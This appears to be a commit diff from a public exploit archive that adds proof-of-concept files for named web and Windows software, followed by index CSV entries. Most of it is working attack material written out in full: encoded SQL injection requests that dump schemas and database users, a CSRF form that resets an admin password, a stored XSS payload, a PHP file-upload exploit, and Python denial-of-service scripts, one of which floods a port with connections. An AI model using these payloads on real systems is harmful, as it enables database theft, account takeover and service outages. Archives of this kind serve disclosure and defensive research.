Content-Length: 433
todate=' union select 1,2,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -
HTTP/1.1 200 OK
Date: Tue, 13 Nov 2018 19:51:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/helpdezk/operator/queryviewrequest/id/[SQL]
#
GET /PATH/helpdezk/operator/queryviewrequest/id/%45%66%65%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%32%3d%32%2c%31%29%29%29%2c%30%78%37%31%36%32%36%62%37%30%37%31%29%29%2d%2d%20%45%66%65 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 13 Nov 2018 19:38:05 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=en6anbv9v4c92rtgdipt5usqt2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 294
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

24
exploits/php/webapps/45848.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2018-11-12
# Exploit Author: Nawaf Alkeraithe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
# Version: 1.0
#PoC:
<html><form enctype="application/x-www-form-urlencoded" method="POST"
action="
http://localhost/Electricks/Electricks/Electricks-shop/pages/admin_account_update.php"><table><tr><td>user_id</td><td><input
type="text" value="4" name="user_id"></td></tr>
<tr><td>firstname</td><td><input type="text" value="admin"
name="firstname"></td></tr>
<tr><td>lastname</td><td><input type="text" value="admin"
name="lastname"></td></tr>
<tr><td>email</td><td><input type="text" value="admin@admin.com"
name="email"></td></tr>
<tr><td>username</td><td><input type="text" value="admin"
name="username"></td></tr>
<tr><td>password</td><td><input type="text" value="NewPass"
name="password"></td></tr>
<tr><td>update</td><td><input type="text" value="" name="update"></td></tr>
</table><input type="submit" value="Change Admin Password"></form></html>

71
exploits/php/webapps/45849.txt Normal file
View file

@ -0,0 +1,71 @@
# Exploit Title: EdTv 2 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://edtv.edsup.org/
# Software Link: https://ayera.dl.sourceforge.net/project/edtv/beta/edtv2go.zip
# Version: 2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Improper access restrictions...
# http://localhost/[PATH]:4001/edtv/index.php/admin/edit_source&?id=[SQL]
#
# edtv//admin//edit_source.php
# ....
#02 $title="แก้ไขแหล่งข้อมูลสื่อ";
#03 $menu_def="edit_source";
#04 include("data_menu.php");
#05
#06 load_fun("media");
#07
#08 if($_POST['title']&&$_POST['url']){
#09 $ret=update_source($_GET['id'],$_POST['title'],$_POST['url']);
#10 }
#11
#12 if($ret)redirect("admin/data_manage");
#13
#14 $data=get_source($_GET['id']);
# ....
# edtv//admin//data_menu.php
# ....
#14 'edit_source' => array(
#15 'title'=>'แก้ไขแหล่งข้อมูล',
#16 'url'=>'admin/edit_source&?id='.$_GET['id'],
#17 'cond'=>$_GET['id']>0,
#18 ),
# ....
GET /[PATH]/edtv/index.php/admin/edit_source&?id=-1%20union%20select%201,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5--%20- HTTP/1.1
Host: TARGET:4001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=c826ffd1a4578bd07c258a5be3ab3482; token_id=1542049202
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 12 Nov 2018 19:00:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5224
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
# POC:
# 2)
# Phpinfo()
# http://localhost/[PATH]:4001/edtv/info.php
#

30
exploits/php/webapps/45853.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: SQL injection in Advanced comment system v1.0
# Date: 29-10-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.plohni.com
# Software Link:
http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip,
https://web.archive.org/web/20120214173003/http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip
# Version: Advanced comment system v1.0
# Tested on: All
# CVE : CVE-2018-18619
# Category: webapps
1. Description
PHP page internal/advanced_comment_system/admin.php in Advanced Comment
System 1.0 is prone to an SQL injection vulnerability because it fails to
sufficiently sanitize user-supplied data before using it in an SQL query,
allowing remote attackers to execute the sqli attack via a URL in the
"page" parameter.
The product is discontinued.
2. Proof of Concept
http://x.x.x.x/internal/advanced_comment_system/admin.php?pw=admin&page=/internal/index.php%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x71717a6b71,0x67424663534f77556d44746a59686f78427354754268636b5466486249616b724d716e4869634758,0x7171626a71),NULL--%20SkrU&del=2
3. Solution:
The product is discontinued.

34
exploits/php/webapps/45855.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Rmedia SMS 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://sms.rmediaindia.com/
# Software Link: https://master.dl.sourceforge.net/project/rmediasms/rmedia_sms.rar
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/editgrp.php?gid=[SQL]
#
GET /[PATH]/editgrp.php?gid=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=31hgqp31e2ten1gk8gousnt0d3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 20:04:34 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 234
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

32
exploits/php/webapps/45856.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Pedidos 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://obedalvarado.pw/
# Software Link: https://netcologne.dl.sourceforge.net/project/sistema-web-de-pedidos-php/pedidos.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/ajax/load_proveedores.php?q=[SQL]
#
GET /[PATH]/ajax/load_proveedores.php?q=%2d%61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%33%2c%34%2c%35%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sun, 11 Nov 2018 21:33:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 703
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

36
exploits/php/webapps/45857.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Electricks eCommerce 1.0 - Cross-Site Scripting
# Date: 2018-11-12
# Exploit Author: Nawaf Alkeraithe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
# Version: 1.0
When a user signs up for an account on the following url:
Electricks-shop/pages/user_signup.php
The contact info input field isn't validated before displaying it to the
admin control panel page where the script will be executed.
Admin Control Panel could be found here:
/Electricks-shop/pages/admin_panel.php
For testing you could register as an admin here:
/Electricks-shop/pages/admin_signup.php
POST /Electricks/Electricks/Electricks-shop/pages/user_signup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/Electricks/Electricks/Electricks-shop/pages/user_signup.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Cookie: PHPSESSID=f7is0t729t957ec7hbfud4oe98
Connection: close
Upgrade-Insecure-Requests: 1
firstname=Nawaf&middlename=test&lastname=Alkeraithe&email=nalkeraithe%
40gmail.com
&address=%3Cscript%3Ealert%28%22Stored+XSS%22%29%3C%2Fscript%3E&contact=nawaf&username=testme&password=tesetme&submit=

118
exploits/php/webapps/45858.txt Normal file
View file

@ -0,0 +1,118 @@
# Exploit Title: DoceboLMS 1.2 - SQL Injection
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.spaghettilearning.com/
# Software Link: https://datapacket.dl.sourceforge.net/project/spaghettilearn/Spaghettilearning%201.2%20Beta/Spaghettilearnin%201.2%20-%20Windows%20version/splearn12beta.exe
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/modules/progcourse/lesson.php?id=[SQL]&idC=[SQL]&idU=[SQL]
#
GET /[PATH]/modules/progcourse/lesson.php?id=%31%27%20%41%4e%44%20%45%4c%54%28%31%3d%31%2c%31%29%20%41%4e%44%20%27%45%66%65%27%3d%27%45%66%65 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: learning=fd935520ed5eafc7e53bffb101c8de6b
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 12 Nov 2018 15:28:22 GMT
Server: Apache/1.3.27 (Win32) PHP/4.3.3
X-Powered-By: PHP/4.3.3
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
# Exploit Title: DoceboLMS 1.2 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.spaghettilearning.com/
# Software Link: https://datapacket.dl.sourceforge.net/project/spaghettilearn/Spaghettilearning%201.2%20Beta/Spaghettilearnin%201.2%20-%20Windows%20version/splearn12beta.exe
# Version: 1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert
#
POST /[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: learning=ab3edb1f569003472985f03a29c58ff3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------25203287911319136191134967575
Content-Length: 394
-----------------------------25203287911319136191134967575
Content-Disposition: form-data; name="max_file_size"
10000000000
-----------------------------25203287911319136191134967575
Content-Disposition: form-data; name="uploadedfile"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------25203287911319136191134967575--
HTTP/1.1 200 OK
Date: Mon, 12 Nov 2018 16:03:33 GMT
Server: Apache/1.3.27 (Win32) PHP/4.3.3
X-Powered-By: PHP/4.3.3
Set-Cookie: learning=ab3edb1f569003472985f03a29c58ff3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
#
GET /[PATH]/fileCorsi/galleryImg/1542038613.user.phpinfo.php HTTP/1.1
Host: 192.168.245.133
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: /[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert
Cookie: learning=ab3edb1f569003472985f03a29c58ff3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 12 Nov 2018 16:03:43 GMT
Server: Apache/1.3.27 (Win32) PHP/4.3.3
X-Powered-By: PHP/4.3.3
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
# POC:
# 2)
# http://localhost/[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert
#
# http://localhost/[PATH]/fileCorsi/galleryImg/[FILE]
#
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/modules/htmlarea/popups/insert_image.php?op=proginsert">
<input name="max_file_size" value="10000000000" type="hidden">
<input name="uploadedfile" size="25" type="file">
<input value="_INS" type="submit">
</form>
</body>
</html>

30
exploits/windows/dos/45859.py Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)
# Discovery by: Daniel
# Discovery Date: 2018-11-12
# Software Name: Bosch Video Management System
# Software Version: 8.0
# Vendor Homepage: https://www.boschsecurity.com/xc/en/products/management-software/bvms/
# Software Link: https://la.boschsecurity.com/es/productos/videosystems_1/videosoftware_1/videomanagementsystems_1/boschvideomanagementsyste_8/boschvideomanagementsyste_8_44761
# Tested on: Windows 10 Pro x64
#Make sure that during the installation of software you installed all the program features available.
#This PoC was carried out in 'Configuration Client', which is part of 'Bosch Video Management System'.
# Steps to produce the crash:
# 1.- run: dos.py
# 2.- Open bosch.txt and copy content to clipboard
# 2.- Open Configuration Client (Normally the installer creates a direct link in desktop)
# 3.- Click on 'Connection:' box and select "Address Book"
# 4.- Copy clipboard in "(Enterprise) Management Server Address:"
# 5.- write "test" in 'Username'
# 6.- Write "test" in 'Password'
# 7.- Click on 'OK'
# 8.- Crash
#!/usr/bin/python
buf = "\x41" * 64
f = open('bosch.txt', 'w')
f.write(buf)
f.close()

46
exploits/windows_x86-64/dos/45850.py Executable file
View file

@ -0,0 +1,46 @@
# Exploit Title: AMPPS 2.7 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.ampps.com/
# Software Link: https://kent.dl.sourceforge.net/project/ampps/2.7/Ampps-2.7-setup.exe
# Version: 2.7
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
#!/usr/bin/python
import socket
print """
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo----
AMPPS 2.7
Ihsan Sencan
---------------Ooooo----
( )
ooooO ) /
( ) (_/
\ (
\_)
"""
Ip = raw_input("[Ip]: ")
Port = 80 # Default port
d=[]
c=0
while 1:
try:
d.append(socket.create_connection((Ip,Port)))
d[c].send("BOOM")
print "Sie!"
c+=1
except socket.error:
print "Done!"
raw_input()
break

15
files_exploits.csv
View file

@ -6188,6 +6188,8 @@ id,file,description,date,author,type,platform,port
45823,exploits/macos/dos/45823.py,"CuteFTP Mac 3.1 - Denial of Service (PoC)",2018-11-13,"Yair Rodríguez Aparicio",dos,macos,
45824,exploits/linux/dos/45824.txt,"Evince 3.24.0 - Command Injection",2018-11-13,Matlink,dos,linux,
45829,exploits/windows/dos/45829.c,"Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service",2018-11-13,hyp3rlinx,dos,windows,
45850,exploits/windows_x86-64/dos/45850.py,"AMPPS 2.7 - Denial of Service (PoC)",2018-11-14,"Ihsan Sencan",dos,windows_x86-64,
45859,exploits/windows/dos/45859.py,"Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)",2018-11-14,Daniel,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10099,6 +10101,8 @@ id,file,description,date,author,type,platform,port
45805,exploits/windows/local/45805.cpp,"Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)",2018-11-08,"Tenable NS",local,windows,
45828,exploits/windows/local/45828.py,"XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)",2018-11-13,"Semen Alexandrovich Lyhin",local,windows,
45832,exploits/linux/local/45832.py,"xorg-x11-server < 1.20.1 - Local Privilege Escalation",2018-11-13,bolonobolo,local,linux,
45846,exploits/linux/local/45846.py,"ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)",2018-11-14,"Magnus Klaaborg Stubman",local,linux,
45854,exploits/macos/local/45854.txt,"SwitchVPN for macOS 2.1012.03 - Privilege Escalation",2018-11-14,"Bernd Leitner",local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16947,6 +16951,7 @@ id,file,description,date,author,type,platform,port
45789,exploits/unix/remote/45789.rb,"Morris Worm - sendmail Debug Mode Shell Escape (Metasploit)",2018-11-06,Metasploit,remote,unix,25
45790,exploits/php/remote/45790.rb,"blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit)",2018-11-06,Metasploit,remote,php,
45791,exploits/bsd/remote/45791.rb,"Morris Worm - fingerd Stack Buffer Overflow (Metasploit)",2018-11-06,Metasploit,remote,bsd,79
45851,exploits/java/remote/45851.rb,"Atlassian Jira - Authenticated Upload Code Execution (Metasploit)",2018-11-14,Metasploit,remote,java,2990
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40352,3 +40357,13 @@ id,file,description,date,author,type,platform,port
45842,exploits/php/webapps/45842.txt,"Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80
45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
45844,exploits/php/webapps/45844.txt,"SIPve 0.0.2-R19 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
45845,exploits/php/webapps/45845.txt,"iServiceOnline 1.0 - 'r' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
45847,exploits/php/webapps/45847.txt,"Helpdezk 1.1.1 - 'query' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
45848,exploits/php/webapps/45848.txt,"Electricks eCommerce 1.0 - Cross-Site Request Forgery (Change Admin Password)",2018-11-14,"Nawaf Alkeraithe",webapps,php,80
45849,exploits/php/webapps/45849.txt,"EdTv 2 - 'id' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
45852,exploits/linux/webapps/45852.py,"Dell OpenManage Network Manager 6.2.0.51 SP3 - Multiple Vulnerabilities",2018-11-14,KoreLogic,webapps,linux,
45853,exploits/php/webapps/45853.txt,"Advanced Comment System 1.0 - SQL Injection",2018-11-14,"Rafael Pedrero",webapps,php,80
45855,exploits/php/webapps/45855.txt,"Rmedia SMS 1.0 - SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
45856,exploits/php/webapps/45856.txt,"Pedidos 1.0 - SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
45857,exploits/php/webapps/45857.txt,"Electricks eCommerce 1.0 - Persistent Cross-Site Scripting",2018-11-14,"Nawaf Alkeraithe",webapps,php,80
45858,exploits/php/webapps/45858.txt,"DoceboLMS 1.2 - SQL Injection / Arbitrary File Upload",2018-11-14,"Ihsan Sencan",webapps,php,80

Can't render this file because it is too large.